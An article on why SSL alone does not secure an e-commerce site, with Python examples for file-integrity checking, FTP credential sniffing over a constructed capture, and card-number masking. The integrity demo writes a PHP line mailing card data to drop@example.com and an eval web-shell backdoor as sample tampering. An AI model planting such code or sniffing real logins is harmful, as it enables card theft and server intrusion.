Does SSL really protect my e-commerce website?
Rhetorically speaking, does an airbag protect you from a fatal car wreck?
The answer is that it could; I'm sure countless lives have been saved by airbags. But the statistics say that passengers protected by an airbag alone, with no seatbelt, are almost 7 times more likely to sustain a fracture of the spinal cord than those protected by both an airbag and a seatbelt.
http://www.umc.pitt.edu/media/pcc040719/seatbelt_airbag.html
What do airbags and seatbelts have to do with your E-Commerce website?
There is a misconception that an SSL certificate is an end-all, be-all solution for protecting your website and your sensitive information from hackers. SSL encrypts the connection between the customer's browser and your server; it says nothing about what happens to the data once it arrives. Like the airbag, it is only really effective when combined with other protections.
You wouldn't put your family in a vehicle that was missing doors, windshield and bumpers and feel secure because it had airbags installed; yet there are family fortunes riding on technology solutions that are just as shaky.
It is true that 128-bit SSL encryption and above is not worth a hacker's time to try to decrypt, but why would they bother when it is so much easier to get into your server through a software vulnerability in your bulletin board or blog, or through a weak password? Once the server is compromised they can alter your shopping cart process without your knowledge and have your customers' credit card information emailed to an anonymous email account.
The odds of success are in the hacker's favor because of the nature of software development. There is no such thing as hacker-proof software; there are only undiscovered vulnerabilities. What makes matters worse is that many million-dollar web businesses are run on shared hosting accounts alongside 300-400 other potentially vulnerable customer websites, or on dedicated servers without firewalls.
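The tampering described above only works "without your knowledge" if nobody is checking the cart's files. A hash manifest taken right after a clean deployment, compared against the live directory on a schedule, catches an edited checkout page, a dropped-in script, or a removed access control. The following is an added example, not code from the original article or from any product it mentions; the cart directory, file contents and the address drop@example.com are constructed in a temporary folder purely for illustration.

```python
"""Detect silent changes to shopping-cart code with a SHA-256 manifest."""
import hashlib
import os
import tempfile
from typing import Dict, List


def build_manifest(root: str) -> Dict[str, str]:
    """Map each file's path (relative to root, '/'-separated) to its SHA-256 digest."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            manifest[rel] = h.hexdigest()
    return manifest


def compare_manifests(known: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Return which files were modified, added or removed since `known` was taken."""
    return {
        "modified": sorted(p for p in known if p in current and current[p] != known[p]),
        "added": sorted(p for p in current if p not in known),
        "removed": sorted(p for p in known if p not in current),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: clean deploy, then the tampering the article describes."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "cart", "admin"))
        with open(os.path.join(root, "cart", "checkout.php"), "w") as f:
            f.write("<?php process_order($_POST); ?>\n")
        with open(os.path.join(root, "cart", "admin", ".htaccess"), "w") as f:
            f.write("Require ip 10.0.0.0/8\n")
        known = build_manifest(root)  # baseline taken right after deployment

        # Attacker appends a line that mails the posted card data to an
        # outside address, adds a backdoor script and removes the admin
        # access control. (Hypothetical content for the demo only.)
        with open(os.path.join(root, "cart", "checkout.php"), "a") as f:
            f.write("<?php mail('drop@example.com', 'cc', print_r($_POST, true)); ?>\n")
        with open(os.path.join(root, "cart", "x.php"), "w") as f:
            f.write("<?php eval($_GET['c']); ?>\n")
        os.remove(os.path.join(root, "cart", "admin", ".htaccess"))

        return compare_manifests(known, build_manifest(root))


if __name__ == "__main__":
    print(demo())
```

Keep the baseline manifest off the web server (the attacker who can edit checkout.php can edit a manifest stored next to it) and run the comparison from a separate host or at least a separate account.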
The nature of shared hosting also works against Internet merchants. Customers are likely to have centralized services such as email, FTP and web in one account. This approach to web hosting is very dangerous for customers who house e-commerce sites on those same servers. FTP (File Transfer Protocol) is still the de facto standard for transferring files to and from your website, yet it has a long history of vulnerabilities and, worse, it transmits usernames and passwords in clear text that anyone on the network path with limited knowledge can read.
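To make the clear-text point concrete, here is what an FTP login looks like to anyone who can see the traffic on port 21. This is an added example, not from the original article: the capture below is constructed by hand to mimic an FTP control-channel conversation (client lines prefixed "C:", server lines "S:"), and the host name, account name, password and file name in it are made up.

```python
"""Pull FTP credentials out of a captured control-channel conversation."""
import re
from typing import List, Tuple

# Constructed sample of what a sniffer on the wire sees; no real host involved.
SAMPLE_CAPTURE = b"""\
S: 220 shop-host FTP server ready
C: USER webshop
S: 331 Password required for webshop
C: PASS s3cret-cart-2009
S: 230 User webshop logged in
C: CWD public_html/cart
S: 250 CWD command successful
C: STOR checkout.php
S: 150 Opening BINARY mode data connection
S: 226 Transfer complete
C: QUIT
S: 221 Goodbye
"""

USER_RE = re.compile(rb"^C: USER (\S+)\s*$")
PASS_RE = re.compile(rb"^C: PASS (\S+)\s*$")
REPLY_RE = re.compile(rb"^S: (\d{3}) ")


def extract_logins(capture: bytes) -> List[Tuple[str, str, bool]]:
    """Return (user, password, accepted) for every login attempt in the capture.

    'accepted' comes from the server's reply to PASS: 230 means the login
    succeeded, 530 means it was refused. Either way the credentials were
    readable on the wire.
    """
    logins = []
    user = password = None
    awaiting_pass_reply = False
    for line in capture.splitlines():
        m = USER_RE.match(line)
        if m:
            user = m.group(1).decode("ascii", "replace")
            continue
        m = PASS_RE.match(line)
        if m:
            password = m.group(1).decode("ascii", "replace")
            awaiting_pass_reply = True
            continue
        m = REPLY_RE.match(line)
        if m and awaiting_pass_reply:
            logins.append((user, password, m.group(1) == b"230"))
            user = password = None
            awaiting_pass_reply = False
    return logins


def uploaded_files(capture: bytes) -> List[str]:
    """File names sent with STOR: the eavesdropper also learns which script changed."""
    return [
        line.split(b" ", 2)[2].decode("ascii", "replace")
        for line in capture.splitlines()
        if line.startswith(b"C: STOR ")
    ]


if __name__ == "__main__":
    for user, pw, ok in extract_logins(SAMPLE_CAPTURE):
        print(f"user={user!r} password={pw!r} accepted={ok}")
    print("uploaded:", uploaded_files(SAMPLE_CAPTURE))
```

With SFTP (SSH) or FTPS (TLS) the same sniffer sees only encrypted bytes after the handshake, which is why both are the replacement for plain FTP on any server that also serves a shopping cart.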
So what can be done to protect your online business? Here are a few guidelines, the first being the most important.
- Stop storing credit card information - Find a way to do business online that does not require you to store credit card information. A payment gateway can provide a hosted payment page so that card details are collected at the gateway, not on your website. SafeMerchant.com offers customers the ability to tightly integrate with their shopping cart or back-end process.
- Separation of duty - Segregate email, chat, bulletin boards, blogs, mailing lists, etc. from the server that runs your shopping cart.
- Lock down the database - The database should be locked down and should also be on a different server from the shopping cart.
If you follow this simple program, the great majority of the risk associated with doing business online will be mitigated.
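Before you can stop storing card numbers you have to find where they already sit: order tables, application logs, mail spools. The scanner below is an added example, not code from the original article or from SafeMerchant.com. It picks out 13 to 19 digit runs, keeps only those that pass the Luhn check that real card numbers satisfy, and masks them down to the last four digits, which is all an order screen needs. The sample rows are constructed; the card numbers in them are the well-known test numbers that pass Luhn but belong to nobody.

```python
"""Find and mask card numbers (PANs) in stored records and log lines."""
import re
from typing import List, Tuple

# 13 to 19 digits, optionally separated by single spaces or dashes,
# not embedded in a longer digit run.
CANDIDATE_RE = re.compile(r"(?<![\d])(?:\d[ -]?){12,18}\d(?![\d])")


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check: true for structurally valid card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def _normalize(match_text: str) -> str:
    return re.sub(r"[ -]", "", match_text)


def find_pans(text: str) -> List[str]:
    """Return the digit strings in `text` that look like PANs and pass Luhn."""
    found = []
    for m in CANDIDATE_RE.finditer(text):
        digits = _normalize(m.group(0))
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            found.append(digits)
    return found


def mask(text: str) -> str:
    """Replace each Luhn-valid number with asterisks plus its last four digits."""
    def repl(m):
        digits = _normalize(m.group(0))
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            return "*" * (len(digits) - 4) + digits[-4:]
        return m.group(0)
    return CANDIDATE_RE.sub(repl, text)


def scan_records(records: List[str]) -> List[Tuple[int, List[str]]]:
    """Scan rows or log lines; return (index, pans) for every row that holds one."""
    hits = []
    for i, row in enumerate(records):
        pans = find_pans(row)
        if pans:
            hits.append((i, pans))
    return hits


# Constructed sample: three rows from an orders table and one debug log line.
# Row 1002 shows the target state: a gateway token plus last four digits only.
SAMPLE_RECORDS = [
    "1001|2009-03-02|j.doe|4111 1111 1111 1111|12/11|approved",
    "1002|2009-03-02|a.smith|tok_8f3a19c2|last4=4242|approved",
    "DEBUG checkout.php: POST card=5555-5555-5555-4444 exp=0112",
    "1003|2009-03-03|b.lee|order total 1234567890123|shipped",
]

if __name__ == "__main__":
    for idx, pans in scan_records(SAMPLE_RECORDS):
        print(f"row {idx}: {pans} -> {mask(SAMPLE_RECORDS[idx])}")
```

Row 1003 carries a 13-digit number that fails Luhn and is correctly ignored, while the debug line shows a second place card data leaks even when the orders table is clean: application logging. Once a hosted payment page is in place, this scan should come back empty across tables, logs and backups.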